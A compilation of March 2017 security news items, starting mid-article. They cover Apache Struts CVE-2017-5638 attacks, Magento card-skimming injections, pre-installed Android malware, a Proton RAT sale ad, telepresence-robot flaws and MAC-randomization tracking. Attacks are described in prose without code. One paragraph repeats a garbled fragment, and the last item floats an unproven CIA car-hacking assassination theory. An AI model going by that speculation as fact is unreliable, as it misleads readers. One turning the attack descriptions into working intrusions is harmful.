The remote code execution vulnerability, tracked as CVE-2017-5638, has been described by VMware as “catastrophic.” The issue impacts versions 6.x and 7.x of the VMware Horizon Desktop-as-a-Service (DaaS) platform, vCenter Server 6.0 and 6.5, vRealize Operations Manager (vROps) 6.x, and vRealize Hyperic Server 5.x.
vCenter 5.5 is not affected. Until fixes become available for vCenter 6.0 and 6.5, users can disable the performance charts service to prevent potential attacks. However, VMware noted that applying the workaround will cause Overview Performance Charts to become unavailable in vSphere Web Client.
Cisco has also launched an investigation to determine which of its products are affected. The networking giant initially identified three products, but the number has now reached 10 and there are still several devices and services under investigation.
Attacks in the wild
This Apache Struts2 vulnerability exists in the Jakarta Multipart parser and is caused by the improper handling of Content-Type header values. A remote, unauthenticated attacker can exploit the flaw to execute arbitrary commands by sending a specially crafted HTTP request.
The security hole was patched on March 6 with the release of versions 2.3.32 and 2.5.10.1, and the first attacks were observed one day later, after a proof-of-concept (PoC) exploit was made public.
Imperva reported seeing thousands of attack attempts in the days following March 7. The attacks were traced to more than 1,300 IP addresses across 40 countries, including China and the United States, which accounted for 67 percent and 17 percent of the attempts, respectively.
According to data from Imperva, 90 percent of attackers focused their efforts on less than 10 applications, while the rest targeted as many as 181 apps.
A majority of the attacks observed by the security firm were attempts to determine if the targeted web application had been vulnerable, but researchers also noticed attempts to create files.
In some cases, the hackers had tried to download and execute files from a remote server. A control panel found on one of these servers showed that some of the files had been downloaded hundreds of times.
The Canada Revenue Agency (CRA) shut down its website for roughly 48 hours last week after learning of the Struts vulnerability. The organization said its site had been taken offline as a precaution, not as a result of a successful breach.
Hackers did manage to breach Statistics Canada's website by exploiting the flaw, but officials said no sensitive data was compromised, CBC reported.
Financial Attackers as Sophisticated as Nation-State Groups: FireEye
14.3.2017 securityweek CyberCrime
Financially motivated attackers have become just as sophisticated as threat actors sponsored by nation states, according to the 2017 M-Trends report published on Tuesday by FireEye-owned Mandiant.
The report, which is based on data from actual incidents investigated by the company, shows that profit-driven cybercriminals have become increasingly sophisticated over the past few years.
Until 2013, cybercriminals mostly launched what experts described as “smash and grab” attacks – little effort was put into hiding their actions and maintaining access to the breached system. In the following years, the line between the level of sophistication exhibited by financial attackers and nation-state actors became increasingly blurry, and now researchers say that line no longer exists.
Financially motivated hackers went from using web shells and Perl2Exe compiled binaries with a limited command and control (C&C) infrastructure to using custom backdoors tailored to the targeted system and leveraging legitimate websites for C&C communications.
One interesting trend observed by Mandiant in 2016 was related to malicious macro-enabled documents. While in many cases attackers attempt to convince targeted users to enable macros by providing instructions in an email or the document itself, in some of the campaigns observed by researchers last year, hackers called victims on the phone to convince them to enable macros.
Retailers can be highly lucrative targets, especially since many of them fail to ensure that their networks are segmented, allowing attackers to breach the entire PCI environment once they have gained access to PoS systems in one location.
Since these attacks can be lucrative, cybercriminals put a lot of effort into them. In one of the attacks investigated by FireEye, a group that targeted more than 100 companies exploited a Windows zero-day vulnerability to escalate privileges on compromised systems.
Cybercriminals also leveraged sophisticated techniques to evade detection and ensure persistence. One of the most interesting methods involved modifying the volume boot record (VBR) to load backdoors before the operating system booted.
FireEye has also analyzed attacks targeting banks. In one incident at a bank in Asia, investigators discovered 96 compromised servers and workstations. The attackers breached a subsidiary’s network and from there they moved to the bank’s infrastructure.
In an attack aimed at a bank in the EMEA region, threat actors hacked into 45 servers and workstations using PowerShell and Metasploit for lateral movement. The attacker used hijacked accounts to initiate transfers of millions of dollars, and then wiped event logs and reformatted system volumes to cause disruptions in an effort to prevent the bank from identifying the fraudulent transactions before the process was completed.
According to FireEye, organizations have been more efficient in identifying breaches themselves, with the global median time from compromise to discovery dropping from 146 days in 2015 to 80 days in 2016. In the Americas, this dwell time was 35 days, but it was much higher in APAC countries, likely due to “lack of investment in security.”
“With an increased willingness of both nation-state and financial threat actors to operate increasingly blatant business disruption, extortion, and public disclosure attacks, fundamental protections such as data and key application segregation, network segmentation, and continuous visibility and monitoring of critical systems have returned to prominence and should remain a primary focus for many IT and security teams,” experts said in the report.
The full M-Trends 2017 report is available online in PDF format.
Enterprises Infected By Pre-installed Android Malware
14.3.2017 securityweek Android
Android devices containing pre-installed malware were recently discovered on 38 mobile devices belonging to two large companies, according to security firm Check Point.
A new report from Check Point reveals that a variety of malware, mostly comprised of info-stealers and sketchy ad networks, though a mobile ransomware family was also discovered among them. What’s also interesting, is that the malware was present on the infected devices before the users received them, although it wasn’t part of the official ROM the vendors supplied.
The security company says that the malicious applications were “added somewhere along the supply chain.” Six of the malware instances, Check Point discovered, were added by a malicious actor using system privileges, meaning that the users had no means to remove the malware unless they re-flashed the ROM.
One of the malicious APKs, com.google.googlesearch, was an adnet present on 6 devices. Another one was the Slocker mobile ransomware, which uses AES encryption to encrypt all files on the device. The malware uses Tor for its command and control (C&C) communications.
The most notable of the threats, however, was the Loki info-stealer and rough adnet, found on devices as the com.androidhelper.sdk APK. The malware, Check Point says, uses several different components, each with its own functionality and role. Loki’s malicious goal, in addition to displaying illegitimate advertisements to generate revenue, is to steal data about the device, while installing itself to the system partition to achieve persistence and take full control of the device.
The infected devices include: Galaxy Note 2, Galaxy Note 3, Galaxy Note 4, Galaxy Note 5, Galaxy Note Edge, Galaxy Note 8.0, Galaxy S7, Galaxy S4, Galaxy A5, Galaxy Tab S2, Galaxy Tab 2, LG G4, ZTE x500, vivo X6 plus, Asus Zenfone 2, Oppo N3, Oppo R7 plus, Xiaomi Mi 4i, Xiaomi Redmi, Lenovo S90, Lenovo A850, Nexus 5, and Nexus 5X.
What the security researchers didn’t reveal was whether the infection was part of a targeted attack against the two affected companies, a large telecommunications company and a multinational technology company.
“Pre-installed malware compromise the security even of the most careful users. In addition, a user who receives a device already containing malware will not be able to notice any change in the device’s activity which often occur once a malware is installed,” Oren Koriat, Check Point Mobile Research Team, says.
Pre-installed malware on mobile devices isn’t new, though it was clear who was to blame for it in previous incidents. In November last year, researchers discovered that the Firmware Over The Air (FOTA) update software system managed by China-based ADUPS performed backdoor activities by collecting information about the devices it was present on. The company said the backdoor was used to im prove user experience.
Also in November 2016, the OTA update mechanism provided by another Chinese company, Ragentek Group, was revealed to expose nearly 3 million devices to Man-in-the-Middle (MitM) attacks and to allow adversaries to execute arbitrary commands with root privileges.
Cybercriminals Hijack Magento Extension to Steal Card Data
14.3.2017 securityweek Incindent
Cybercriminals have been abusing a payment module to steal credit card data from online shops powered by the Magento ecommerce platform, web security firm Sucuri reported on Friday.
The targeted module is the Realex Payments Magento extension (SF9), which integrates with the Realex Realauth Remote payment gateway. The Realex Payments extension allows Magento store owners to process mail and telephone orders by entering the payment details themselves.
The extension itself is not vulnerable, but attackers can abuse it after they compromise the targeted Magento shop. In the attacks observed by Sucuri, hackers added a malicious function called sendCcNumber() to an SF9 file named Remote.php.
The function collects personal and financial data entered by users on the compromised website and sends it back to an email address controlled by the attacker.
The malicious function also leverages the online service binlist.net, which allows users to identify the issuer of a card based on the first six digits of the card number.
Sucuri said it had tracked “massive attacks” where hackers had injected malicious scripts into Magento websites in an effort to steal card data.
“Magento credit card stealers are indeed on the rise. While the information here is specific to Magento, realize that this can affect any platform that is used for ecommerce,” said Bruno Zanelato, malware analyst and team lead at Sucuri. “As the industry grows, so will the specific attacks targeting it. That’s why it is so important to keep your Magento website up to date and apply all the latest security patches!”
These types of attacks are not uncommon, and cybercriminals have used various tricks to evade detection and ensure that their malware is persistent.
In a campaign documented a few months ago, attackers hid stolen card data in harmless-looking image files related to products sold on the compromised website. More recently, researchers identified a piece of malware that restored itself on Magento websites after it had been removed.
Researchers Infiltrate C&C Server Behind CryptoBlock Ransomware
14.3.2017 securityweek Virus
A command and control (C&C) server used for operating the CryptoBlock ransomware family has also been hosting stolen user credentials and other malware families, researchers say.
According to researchers from Malwarebytes Labs, who managed to gain access to the malicious server, the ransomware appears to still be under development at the moment, but is believed to have the potential of becoming a major threat. The malicious operation could even evolve into a RaaS (Ransomware as a Service), the researchers believe.
A note on the domain fliecrypter.in informs wannabe-criminals that the RaaS will be live soon, but it appears that some users have already been infected with this malware (although the distribution mechanism isn’t clear as of now). The ransomware, however, is completely obfuscated with ConfuserEX, which is difficult to unravel, researchers say.
The security experts decided to have a look at the ransomware’s server, which they acquired during previous research, and which revealed, among other .php pages, a config.php file that included the actor’s login credentials for the server. Specifically, the file revealed “the complete master credentials (username and password) to the entire CryptoBlock server, valid for every email, database, SSH, cPanel, and more,” Nathan Scott, Malwarebytes Labs Lead Malware Intelligence Analyst, notes.
Courtesy of these, the researchers gained complete access to a threat actor’s overseas server, which allowed them to copy all of the data there, including databases, PHP files, and the personal information used to rent the server. However, because the hosting company only required an email address to host the server, and because the email was fake, the researchers couldn’t learn more on the actor.
Server logs, however, revealed that the ransomware might have already infected quite a few people, and that there were “a few IP addresses from Europe that have been visiting this server by the thousands since it was brought up.” These, the researchers say, might be the real IPs used by the threat actor owning the server while testing the malware (the most accessed part of the server was a PHP page that is used by the debug build of the ransomware server).
The server was also found to host a full database of stolen credentials from “Pay for Porn” sites, and the database of ransomware users (with IDs, BTC addresses, payments, and keys). Moreover, it revealed that the threat actor applied for a Blockchain API account, and was denied, and that other malware was being distributed from it as well.
“The threat actor is also distributing an exploitable Ammyy Admin executable from the server. It seems they either may be scamming people into letting them onto the machine remotely, or they are simply running it silently as a malicious drive-by. The file on the server is called test.exe,” Scott explains.
Crooks hijack Magento Realex Payments extension to steal payment card data
14.3.2017 securityaffairs Crime
Cybercriminals hijack Magento Realex Payments extension to steal payment card data. Experts at Sucuri are observing massive attacks.
Cybercriminals continue to target Magento platform to steal credit card data. Crooks have been abusing a payment module to steal payment card data from online shops running on Magento e-commerce platform.
According to experts at security firm Sucuri, the hackers are targeting module is the Realex Payments Magento extension (SF9), that integrates with the Realex Realauth Remote payment gateway.
The extension allows the administrators of Magento installs to process mail and telephone orders by entering the payment details.
The experts highlighted that the Realex Payments extension is not affected by any vulnerability, the attackers are abusing it once compromised the Magento installation.
The researchers at Sucuri noticed that crooks added a malicious function called sendCcNumber() to an SF9 file named Remote.php.
This function gathers personal and financial data entered by users and sends it back to an email address controlled by the attacker.
“In this particular case, we found a malicious function specifically targeting the Magento payment module SF9 Realex. SF9 integrates with the Realex RealAuth Remote and Redirect systems, very popular solutions in the Magento community.” reads the analysis published by Sucuri.
“The malicious function had been injected after the website was compromised through a different vulnerability, therefore the component itself (SF9 Realex) wasn’t the source of the problem.”
The researchers also noted that the crooks leverage binlist[.]net to get the Issuer Identification Numbers (IIN) (The first 6 digits of a credit card number).
The experts at Sucuri have observed “massive attacks” where hackers used the injection of malicious scripts into Magento websites in an attempt to steal payment card data.
The researchers warn of a spike in the attack against the e-commerce platforms, for this reason, it is essential to keep websites up to date and apply all security updates.
“Magento credit card stealers are indeed on the rise. While the information here is specific to Magento, realize that this can affect any platform that is used for ecommerce,” concluded the analysis at Sucuri. “As the industry grows, so will the specific attacks targeting it. That’s why it is so important to keep your Magento website up to date and apply all the latest security patches!”
Recently, security expert Willem de Groot discovered a new SQL malware targeting online shops running on Magento that was able to hide its malicious code in the website’s database.
New variant of the macOS Proton RAT advertised on Russian cybercrime underground
14.3.2017 securityaffairs Apple
Experts from security firm Sixgill have discovered a new strain of the macOS Proton RAT that is offered for sale on Russian cybercrime underground.
The Dark Web is the right place where to find any kind of illegal products and services, malware such as banking trojan and spyware are very popular in cyber criminal underground.
Recently a new remote access tool (RAT) specifically designed to infect macOS systems is currently being advertised on Russian cybercrime underground. The researchers at security firm Sixgill discovered the advertising on crime forums and on a custom website, this threat is also described in videos published on YouTube.
The Proton homepage went down just after the experts at Sixgill published the report.
“Sixgill researchers have encountered a post in one of the leading, closed Russian cybercrime message boards. The author of the thread announced a RAT dubbed Proton, intended for installation exclusively on MAC OS devices. The author offered this product in one of the leading underground cybercrime markets.” reads a report published by Sixgill.
The Proton RAT first appeared in the threat landscape last year, the variant recently advertised on hacking forums includes many features such as the ability to execute console commands, access the user’s webcam, log keystrokes, capture screenshots and open SSH/VNC remote connections. The malicious code is also able to inject malicious code in the user’s browser to display popups asking victims information such as credit card numbers, login credentials, and others.
“The malware includes root-access privileges and features allowing an attacker to obtain full control of the victim’s computer. Its capabilities include: running real-time console commands and file-manager, keylogging, SSH/VNC connectivity, screenshots, webcam operation and the ability to present a custom native window requesting information such as a credit-card, driver’s license and more. The malware also boasts the capability of iCloud access, even when two-factor authentication is enabled.” continues the report.
According to the author, macOS Proton RAT is written in native Objective-C and it is fully undetected by any existing MAC OS antivirus solution.
Below the list of features described in the ad:
The Proton RAT has root access and is able to elude standard macOS security features, it is also able to bypass two-factor authentication on iCloud accounts.
Researchers speculate macOS Proton RAT leverages a zero-day vulnerability in macOS, but most interesting characteristic of the threat is that the malicious code is signed with genuine Apple code-signing certificates. It is likely the author has managed to falsify registration to Apple Developer ID Program or has stolend the credentials to an apple developer.
“The real threat behind the software is this: The malware is shipped with genuine Apple code-signing signatures. This means the author of Proton RAT somehow got through the rigorous filtration process Apple places on MAC OS developers of third-party software, and obtained genuine certifications for his program. Sixgill evaluates that the malware developer has managed to falsify registration to the Apple Developer ID Program or used stolen developer credentials for the purpose.” reads the report.
The price for the macOS Proton RAT ranged from $1,200 to $830,000 for the entire project (an absurd price). Below the version advertised on the Proton websites:
Standard Edition
I) License to control only ONE remote machine 1) 1 BTC — unsigned 2) 2 BTC — signed
II) License to control 20 remote machines 1) 10 BTC — unsigned 2) 11 BTC — signed
III) License to control infinite remote machines 1) 66 BTC — unsigned 2) 76 BTC — signed
Extended edition
I) License to control infinite remote machines 1) 166 BTC — unsigned 2) 200 BTC — signed
II) License to control infinite remote machines on your own server 1) 366 BTC — without source code 2) 666 BTC — with full source code
Researchers noticed that the authors of the malware try to disguise their spyware as legitimate surveillance software.
Facebook and Instagram will not allow developers from scanning social media profiles for surveillance
14.3.2017 securityaffairs Social
Facebook company and Instagram will not allow developers scanning their social media profiles for surveillance activities.
Facebook and it app Instagram have updated the terms and conditions to prevent developers from scanning social media profiles for surveillance activities.
A report recently published revealed the US Department of Homeland Security used software to scan social media accounts of people visiting the USA trying to identify terrorists.
The experiment was conducted by in December 2015 by the US Citizenship and Immigration Services, but the results obtained were not satisfactory.
The disappointing results pushed the DHS on looking for companies to improve their scanning capabilities.
“DHS has established a task force for using social media to screen applicants for immigration benefits. In connection with that effort, U.S. Citizenship and Immigration Services (USCIS) began pilots to expand social media screening of immigration applicants” reads the report. “
“In reviewing the pilot, USCIS concluded that the tool was not a viable option for automated social media screening and that manual review was more effective at identifying accounts,”
“USCIS based its conclusion on the tool’s low ‘match confidence.’ Because the resulting accounts identified by the tool did not always match up with the applicants, officers had to manually check the results. However, USCIS did not establish match benchmarks for the tool, so it does not know what level of match confidence would signify success or failure.”
FB surveillance
Facebook has decided to stop allowing private companies and Government agencies in using the data feeds belonging to its social media platform and Instagram for surveillance activities.
“Developers cannot ‘use data obtained from us to provide tools that are used for surveillance.’ Our goal is to make our policy explicit,” Facebook said.
“Over the past several months we have taken enforcement action against developers who created and marketed tools meant for surveillance, in violation of our existing policies; we want to be sure everyone understands the underlying policy and how to comply.”
Other IT giants have adopted a similar policy before Facebook, last year Twitter blocked US intelligence agencies from accessing a service that analyzes the content posted online through the social media platform in real time.
“Twitter Inc. cut off U.S. intelligence agencies from access to a service that sifts through the entire output of its social-media postings, the latest example of tension between Silicon Valley and the federal government over terrorism and privacy.” states the The Wall Street Journal.
The social media giant owns about a five percent stake in Dataminr which is the unique service allowed to access the real-time stream of public tweets.
Twitter banned third-party companies from selling data to intelligence agencies for surveillance. After a pilot programme conducted by In-Q-Tel now ended, the company told Dataminr that it will stop providing the service to the US Government. Dataminr has a $225,000 contract to provide its service to the Department of Homeland Security.
Of course, such kind of measure will not block surveillance programs conducted by the US intelligence that can demand data from Facebook via National Security Letters, or collect information through surveillance programs like PRISM.
Vulnerabilities Found in Double Telepresence Robots
13.3.2017 securityweek Vulnerebility
Researchers at Rapid7 discovered several vulnerabilities in Double telepresence robots from Double Robotics. The vendor has addressed the more serious issues with server-side fixes.
Double is a robot that allows people to have a physical presence at their workplace or school without actually being there in person. The product, often described as an iPad on a stick, has been used by many companies and universities.
Rapid7 researchers discovered that the Double telepresence robot had been affected by at least three vulnerabilities, including ones that could have been, or can be, exploited to take control of the machine.Double robot
One of the flaws found by experts allowed an unauthenticated attacker to gain access to device information, including GPS coordinates, device serial numbers, current and historical driver and robot session data, a device installation keys. The security hole could have been exploited simply by incrementing the value of a parameter in a specified URL.
The second vulnerability is related to the access token (driver_token) created when an account is assigned to a robot. The problem, according to researchers, was that the token never changed or expired, allowing an attacker who possessed the token to remotely take control of a robot.
The access token could have been obtained via a SSL man-in-the-middle (MitM) attack or from the robot’s iPad.
The third weakness is related to the fact that an attacker does not need to know the challenge PIN when pairing the mobile application (i.e. the iPad) to the drive unit via Bluetooth, enabling them to take control of the drive unit.
However, there are some mitigations against potential attacks. The attacker needs to be in Bluetooth range – the distance can be up to one mile if a high-gain antenna is used – and only one mobile device can be paired with the drive unit at one time.
The vulnerabilities were reported to Double Robotics in December, and the unauthenticated data access and session management flaws were addressed in mid-January on the server side.
The vendor believes the Bluetooth pairing issue is not a serious vulnerability and it does not plan on fixing it. Nevertheless, Rapid7 believes users should be aware of the flaw.
“Rapid7's thorough penetration tests ensure all of our products run as securely as possible, so we can continue delivering the best experience in telepresence,” said Double Robotics co-founder and CEO David Cann. “Before the patches were implemented, no calls were compromised and no sensitive customer data was exposed. In addition, Double uses end-to-end encryption with WebRTC for low latency, secure video calls.”
Rapid7 also reported the vulnerabilities to CERT/CC. The organizations agreed not to assign CVE identifiers considering that only one instance of the software was affected and users were not required to take any action to apply the patches.
Rapid7’s security advisory comes just days after IOActive warned that many robots are affected by serious vulnerabilities.
UK Intelligence Agency Warns of Russian Political Hacking Capabilities
13.3.2017 securityweek BigBrothers
The UK's National Cyber Security Center (NCSC, part of GCHQ) has written to the British political parties to warn about "the potential for hostile action against the UK political system." Without confirming that the main threat is from Russia, the letter makes it clear that the primary threat is considered to be that country.
In a similar vein, the British Foreign Secretary Boris Johnson said on national television Sunday, "We have no evidence the Russians are actually involved in trying to undermine our democratic processes at the moment. We don’t actually have that evidence. But what we do have is plenty of evidence that the Russians are capable of doing that."
He added, "There is no doubt that they have been up to all sorts of dirty tricks – bringing down French TV stations; you have seen what happened in the United States where there is no question at all they were involved in the hacking of the Democratic National Convention."
In October 2016, the US government accused Russia of being behind cyberattacks against American political organizations. In December 2016, Germany accused Russia of waging hybrid political warfare. "Such cyber-attacks, or hybrid conflicts as they are known in Russian doctrine, are now part of daily life and we must learn to cope with them," said Chancellor Angela Merkel. Earlier this month the French government abandoned plans for expatriate electronic voting in the April/May presidential election after the National Cybersecurity Agency warned of an "extremely high risk" of cyberattacks.
In his letter to the British political parties, NCSC chief executive Ciaran Martin wrote, "You will be aware of the coverage of events in the United States, Germany and elsewhere reminding us of the potential for hostile action against the UK political system. This is not just about the network security of political parties' own systems. Attacks against our democratic processes go beyond this and can include attacks on parliament, constituency offices, thinktanks and pressure groups and individuals' email accounts."
In a separate statement, he explained, "Protecting the UK’s political system from hostile cyber-activity is one of our operational priorities, so we have signposted parties to existing guidance and will deliver tailored seminars on cyber-security measures. The seminars will build on our existing advice and will provide an overview of threats, case studies on recent cyber-incidents, practical steps to reduce the risk and advice on incident management."
New Malware Variants Near Record-Highs: Symantec
13.3.2017 securityweek Virus
The number of new malware variants that emerged in February 2017 was three times higher compared to January, nearly reaching the record-high levels registered in October 2016, Symantec reports.
Last month the security company registered 94.1 million malware variants, which marks a worrying increase when compared to the 32.9 million seen in January and only 19.5 million in December. Furthermore, Symantec’s Latest Intelligence for February 2017 reveals that the Kovter malware family is the driving force behind this uptick.
The rate of email malware increased as well, reaching one in 635 emails in February, up from one in 722 the previous month. Despite that, the overall email malware rates remain low compared to previous months, most probably as the result of “a lull in activity from the Necurs botnet which has been quiet since late last year,” Symantec says.
The global spam rate registered a very small drop of only 0.1 percentage points in February, reaching 53.7% from the 53.8% registered in January. The Construction sector was hit the most, with a 59.28% spam rate, followed very closely by the Mining sector at 59.27%.
The number of web attacks blocked in February was of 394,000 per day, down slightly from 419,000 in January, Symantec says. RIG remains the most active exploit kit, with 25% share (down from 28.9% in January), followed by SunDown at 14.5% (up from 8.1% in January), Magnitude at 4.6% (down from 6.1%), Angler at 0.6% (down from 0.9%), and Neutrino at 0.5% (down from 0.8%).
One of the most notable threats discussed in February was the destructive disk-wiping malware Shamoon, which is believed to have been used by actors conducting a much wider campaign in the Middle East. According to Symantec, Shamoon was used only against specific targets, although the group has been targeting a wider range of organizations.
The number of Android malware variants per family reached 60 last month, although no new malware family was discovered. New variants of the Android.Lockdroid.E family were found last month, one designed to use speech recognition APIs and to demand victims to speak the provided unlock code instead of typing it.
Phishing attacks decreased last month as well, reaching one in 8,246 emails, down from one in 3,271 in January. The phishing rate declined across all industries, the researchers say.
“While phishing rates declined last month, we also saw a new tactic being used by smartphone thieves who are now attempting to phish their victim's login credentials in order to unlock stolen phones. Stolen high-end smartphones can earn criminals a lot of money, but only if they can gain access to them. This latest trick shows the lengths thieves are willing to go to get into a device,” Symantec reports.
The CVE-2017-5638 Apache Struts 2 command execution flaw affects Cisco products
13.3.2017 securityaffairs Vulnerebility
On Friday, Cisco confirmed that at least some of its products are affected by an Apache Struts 2 command execution vulnerability tracked as CVE-2017-5638.
The CVE-2017-5638 remote code execution zero-day has been exploiting by attackers in the wild, it affects Struts 2.3.5 through 2.3.31 and Struts 2.5 through 2.5.10.
According to the experts from Cisco Talos, the flaw affects the Jakarta-based file upload Multipart parser under Apache Struts 2.
Tinfoil Security has published an online tool that allows website owners to check if they are vulnerable to CVE-2017-5638 attacks.
The issue was first spotted by the Chinese developer Nike Zheng, the attack sends an invalid Content-Type value to the uploader throwing an exception creating the condition for the remote code execution.
The issue is documented at Rapid7’s Metasploit Framework GitHub site and attackers in the wild are exploiting a publicly available PoC code that triggers the vulnerability.
“Talos has observed a new Apache vulnerability that is being actively exploited in the wild. The vulnerability (CVE-2017-5638) is a remote code execution bug that affects the Jakarta Multipart parser in Apache Struts, referenced in this security advisory.” reads the security advisory published by the Talos group. “Talos began investigating for exploitation attempts and found a high number of exploitation events.”
Now Cisco confirmed that the vulnerability affects the Cisco Identity Services Engine (ISE), the Prime Service Catalog Virtual Appliance, and the Unified SIP Proxy Software.
Cisco published a list of dozens of products that are not affected, but the experts are conducting further analysis to assess all the potentially impacted products.
“Cisco is investigating its product line to determine which products may be affected by this vulnerability and the impact on each affected product. Please refer to the Vulnerable Products andProducts Confirmed Not Vulnerable sections of this advisory for information about whether a product is affected.” reads the security advisory published by CISCO.
“The Vulnerable Products section includes Cisco bug IDs for each affected product. The bugs are accessible through the Cisco Bug Search Tool and contain additional platform-specific information, including workarounds (if available) and fixed software releases.”
At the time the advisory was published, Cisco has not found any evidence of attacks targeting its products, but the company has warned users that a PoC exploit is publicly available.
The experts also observed malicious attacks which turn off firewall processes on the target servers and then drop malicious payloads such as IRC bouncers and DDoS bots.
According to the security Rapid7, the majority of malicious traffic comes from two machines located in Zhengzhou and Shanghai, China.
“Based on the traffic we are seeing at this time it would appear that the bulk of the non-targeted malicious traffic appears to be limited attacks from a couple of sources. This could change significantly tomorrow if attackers determine that there is value in exploiting this vulnerability.” reads the blog post published by Rapid 7.
Security vendors have started releasing firewall rules that could be used by administrators to protect their systems and block the attacks.
Flaws in MAC address randomization implemented by vendors allow mobile tracking
13.3.2017 securityaffairs Mobil
Researchers devised a new attack method that can be leveraged to track mobile devices that rely on MAC address randomization mechanism.
The MAC address is a unique and an hardcoded identifier assigned to a device’s network interface. This characteristic makes it an excellent tool for the tracking of the devices. A group of researchers from the U.S. Naval Academy has devised a new attack method that can be leveraged to track mobile devices that rely on Media Access Control (MAC) address randomization mechanism used to protect the users’ privacy.
The MAC address randomization uses broadcasting a random Wi-Fi MAC address making difficult the monitoring of the MAC address.
Starting from a previous research, the researchers have demonstrated that MAC address randomization is not sufficient to protect the users.
The MAC address randomization was introduced by Google for Android devices in 2015 with the release of Android 6 Marshmallow.
The experts discovered that many device manufacturers that use Android, including Samsung, have not enabled MAC address randomization.
Apple introduced the feature in mid-2014 with the release of iOS 8, but experts found that iOS 10 makes it easy to identify and track devices regardless of their use of MAC address randomization.
U.S. Naval Academy researchers identified serious flaws in a majority of the Android implementations of MAC randomization, allowing them to break the protection in the case of roughly 96 percent of mobile devices they have tested.
“First, we show that devices commonly make improper use of randomization by sending wireless frames with the true, global address when they should be using a randomized address.” reads the paper published by the experts.
“We move on to extend the passive identification techniques of Vanhoef et al. to effectively defeat randomization in ∼96% of Android phones. Finally, we show a method that can be used to track 100% of devices using randomization, regardless of manufacturer, by exploiting a previously unknown flaw in the way existing wireless chipsets handle low-level control frames.”
The experts also analyzed so-called Karma attacks, a method that leverages on rogue access points (EvilAP attack) that pose as known and trusted networks.
They researchers devised a new method that relies on Request-to-Send (RTS) and Clear-to-Send (CTS) control frames to expose the global MAC address for any kind of device.
According to the IEEE 802.11 specification, the RTS and CTS control frames are used to avoid collisions, basically every time a node using the channel to send data, it transmits also an RTS frame to inform other nodes that the channel should not be used in order to avoid collisions. time a node in using the channel to send data, it transmits also an RTS frame to inform other nodes that the channel should not be used in order to avoid collisions. time a node in. time a node in
The recipient node responds with a CTS frame when it is ready to receive data.
The knowledge of this mechanism could be exploited by attackers that can send an RTS frame to IEEE 802.11 client devices, then analyzing the CTS response it can derive the global MAC address of the target. Once obtained the global MAC address, the attacker can use it to track the target device in the future by sending it RTS frames containing the global MAC.
The group of expert successfully tested the technique on several models from multiple vendors, including iPhone 5s, iPhone 6s, iPad Air, Google Pixel, LG Nexus 5X, LG G4 and G5, Motorola Nexus 6, Moto Z Play and OnePlus 3.
MAC address randomization flaws
Experts speculate RTS/CTS responses are managed within the 802.11 chipset, instead of the operating system, this means the only way to prevent the attacks is to develope a firmware patch that have to be distributed by manufactures.
“There are multiple scenarios in which a motivated attacker could use this method to violate the privacy of an unsuspecting user. If the global MAC address for a user is ever known, it can then be added to a database for future tracking,” added the researchers. “Conceivably, an adversary with a sufficiently large database and advanced transmission capabilities could render randomization protections moot.”
The experts highlighted the importance to adopt a universal randomization policy with clear requirements for the implementation of the protection mechanism.
“We propose the following best practices for MAC address randomization. Firstly, mandate a universal randomization policy to be used across the spectra of 802.11 client devices. We have illustrated that when vendors implement unique MAC address randomization schemes it becomes easier to identify and track those devices.” concluded the experts. “A universal policy must include at minimum, rules for randomized MAC address byte structure, 802.11 IE usage, and sequence number behavior,”
CHIPSEC, Intel Security releases detection tool also for CIA EFI rootkits
13.3.2017 securityaffairs BigBrothers
After CIA leak, Intel Security releases CHIPSEC, a detection tool for EFI rootkits that detect rogue binaries inside the computer firmware.
A few days ago, WikiLeaks announced it is working with software makers to fix the zero-day flaws in Vault7 dump that impacted their products and services. The organization is sharing information on the hacking tools included in the Vault7 dump with them and IT vendors are already working to solve the problems.
In response to the CIA data Leak, Intel Security has released a tool that allows users to check if the firmware of their computers has been modified and contains unauthorized code.
Digging the CIA archive the experts discovered that the hackers of the Agency have developed EFI (Extensible Firmware Interface) rootkits for Apple’s Macbooks.
Developers at the CIA Embedded Development Branch (EDB) group have designed an OS X “implant” called DerStarke that implements a kernel code injection mechanism in a module dubbed Bokor and uses an EFI persistence module called Dark Matter.
The UEFI (Unified EFI) replaces the BIOS in modern computers, it is the low-level firmware that runs just before the operating system during the bootstrap process to initialize the computer.
It is composed of a huge number “applications” that implements different features in modern computers.
A malware running in a stealth way in the EFI is able to bypass any security mechanism and inject malicious code into the OS kernel, it also alsogain persistence on the infected machine, allowing the rootkits to survive reboots, system updates and even re-installations of the OS.
Reading the documents it is possible to discover another project developed by the CIA EDB code-named QuarkMatter that is a “Mac OS X EFI implant, which uses an EFI driver stored on the EFI system partition to provide persistence to an arbitrary kernel implant.”
Now the Advanced Threat Research team at Intel Security has designed a new module for its existing CHIPSEC open-source framework that is able to detect malicious EFI binaries.“CHIPSEC is a framework for analyzing the security of PC platforms including hardware, system firmware (BIOS/UEFI), and platform components. It includes a security test suite, tools for accessing various low-level interfaces, and forensic capabilities.” reads the description of the framework.”It can be run on Windows, Linux, Mac OS X and UEFI shell. Instructions for installing and using CHIPSEC can be found in the manual (chipsec-manual.pdf).”CHIPSEC is a collection of command-line tools that use low-level interfaces to analyze a system’s hardware, firmware, and platform components.The new CHIPSEC module allows the user to take a clean EFI image from the manufacturer, extract its contents and build a whitelist of the files it contains.
The CHIPSEC allow users to compare the above list against the list of binaries that compose the system’s current EFI or against an EFI image previously extracted from a system.
Michael Hastings crash, incident or assassination? New doubts after Wikileaks Vault 7 leak
13.3.2017 securityaffairs BigBrothers
Was Michael Hastings a victim of the CIA hacking tools? Wikileaks Vault 7 data leak reveals the ability of the Agency of car hacking.
This is the story of the mysterious death of Michael Hastings, an American journalist, who rose to prominence with his coverage of the Iraq War for Newsweek in the 2000s.
But to better understand the figure, let’s remind that Hastings was one of the most critic people of the Obama administration and its interference on the US journalism. He was referring to the restrictions on the freedom of the press by the Obama administration as a “war” on journalism.
His last work, “Why Democrats Love to Spy On Americans“, was published by BuzzFeed on June 7. Hastings died in a fiery high-speed automobile crash on June 18, 2013, in Los Angeles, California.
Michael Hastings crash
When the popular hackers Charlie Miller and Chris Valasek demonstrated that is possible to hack a connected car remotely, many experts and journalist started speculating that Hastings incident was caused by the US intelligence that had used some special tool to remotely control a vehicle. Sci-fi? Yet another conspiracy theory?
Last week Wikileaks released the “Vault 7,” a huge trove of CIA files that provided detailed information on the hacking capabilities of the US Central Intelligence Agency, including the ability to remotely hijack vehicles in order to conduct “undetectable assassinations.”
